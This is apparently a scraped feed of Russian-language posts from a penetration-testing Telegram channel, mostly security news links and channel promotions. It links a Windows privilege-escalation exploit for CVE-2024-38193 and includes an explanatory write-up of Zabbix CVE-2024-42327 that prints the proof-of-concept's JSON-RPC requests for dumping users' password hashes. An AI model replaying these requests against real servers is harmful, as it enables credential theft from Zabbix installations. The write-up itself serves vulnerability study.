🔗Ссылка:
https://www.securitylab.ru/news/554471.php

Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

P.s. сейчас там открылся набор в PFS Academy

🔗Ссылка:
https://habr.com/ru/companies/bastion/articles/862388/

CVE-2024-38193: Windows LPE

PATCHED: August 13, 2024

https://github.com/Nephster/CVE-2024-38193

P.S. Протестил на Win11, работает

#git #exploit #lpe #pentest #redteam

🔗Ссылка:
https://www.securitylab.ru/analytics/554408.php

🔗Ссылка:
https://www.securitylab.ru/news/554444.php

Привеееет! Всем спасибо за такое количество обратной связи и за то, что вникаете в проблемы канала.
Я решил сделать закрытый канал, чтобы избежать различных блокировок, канал будет бесплатным,
а кто захочет прсото сможет за интересную информацию задонатить🫡
Желаю вам приятного обучения или просто чтения, просьба не флудить, соблюдать правила, уважать друг друга,
не сливать материалы, пользоваться по назначению полученными знаниями, делиться знаниями в ответ и помогать своим товарищам.

Сделал много веток, поскольку и контент у меня разносольный.
Велком в наш закрытый клуб: https://t.me/+0H-FyThRQl1lMzVi
Ссылка на приватный чат также будет в описании этого канала.

🔗Ссылка:
https://www.securitylab.ru/news/554493.php

Как читают отчет по пентесту (нецензурная версия)

🔗Ссылка:
https://securelist.ru/malware-report-q3-2024-non-mobile-statistics/111145/

CVE-2024-42327 / ZBX-25623
*
zabbix SQLi
*
POC

CVE-2024-42327 в Zabbix
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные SQL запросы. Нашел PoC и немного удивился, провел ресерч и ничего общего с SQLi не увидел. Давайте разберемся, о чем же эта бага.

CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с JSON-RPC API Zabbix. Она позволяет хакеру с минимальными правами (пользователь с доступом к API) извлекать конфиденциальные данные о других учетных записях, включая имена, фамилии, идентификаторы и хэшированные пароли. Проблема кроется в неправильной проверке авторизации и прав доступа, а не в манипуляции SQL запросами. Уязвимость базируется на логической ошибке в реализации API. Метод user.get предоставляет доступ к данным, которые не должны быть видны пользователю с минимальными правами. Злоумышленник использует легитимные методы API, такие как user.login и user.get. Запросы передаются в формате JSON, и сервер возвращает ответ.

Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)

Внутри исходника присутствует аргумент selectRole в запросе API и может создать впечатление работы с SQL запросами, так как он содержит поля, такие как roleid и u.passwd. Однако это параметры API, а не запросы к БД.

в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.

Первый этап: Аутентификация через API
Метод user.login используется для получения токена сессии, необходимого для выполнения запросов.

{
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        "username": "guest",
        "password": "guest_password"
    },
    "id": 1
}

После этого сервер возвращает токен

{
    "jsonrpc": "2.0",
    "result": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод user.get, перебирай ID пользователей

{
    "jsonrpc": "2.0",
    "method": "user.get",
    "params": {
        "selectRole": ["roleid, u.passwd", "roleid"],
        "userids": "1"
    },
    "auth": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

В ответе возвращаются данные с хэшированным паролем

{
    "jsonrpc": "2.0",
    "result": [
        {
            "userid": "1",
            "username": "Admin",
            "name": "Zabbix",
            "surname": "Administrator",
            "passwd": "$2y$10$92nDno4n0Zm7Ej7Jfsz8WukBfgSS/U0QkIuu8WkJPihXBb2A1UrEK"
        }
    ],
    "id": 1
}

Чтобы провернуть эту схему, нужно иметь доступ к JSON-RPC API Zabbix, чаще всего у него такой эндпоинт.

http://zabbix/api_jsonrpc.php

И учетка с минимальными правами, которая может дернуть метод user.login.
Уязвимые версии:

Zabbix 6.0.0–6.0.31
Zabbix 6.4.0–6.4.16
Zabbix 7.0.0.

cve-2024-42327.py -u http://zabbix/api_jsonrpc.php -n Vanya -p Qwerty123

PoC

Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка:
https://habr.com/ru/companies/selectel/articles/862372/

Рубрика .git leaks
*
Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа.
Токены обеспечивают доступ к:
108 707 репозиториям кода.
2117 организациям/группам.
*
Список юзеров у которых увели токен с GitHub
Список юзеров у которых увели токен с GitLab
*
Ищем себя ))
Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с Gi7w0rm , добряки )))

Всем хак 👾

Хочу поделиться с вами отличной новостью! Мой знакомый, талантливый багхантер, запустил свой собственный канал, где будет делиться своим опытом и знаниями в области вебчика! 🔍

Сверху репостнул с его канала перевод книги, которую, скорее всего, вы бы не нашли. Это отличная возможность углубить свои знания! 📚

Если вы интересуетесь кибербезопасностью, то обязательно загляните на его канал:
https://t.me/sytem10gs 👈🏻

И, кстати, это не реклама — мне не заплатили ни копейки! Просто хочу поддержать интересный проект.

Подписывайтесь и учитесь! 🦈

🔗Ссылка:
https://opennet.ru/62346/

🔗Ссылка:
https://www.securitylab.ru/news/554549.php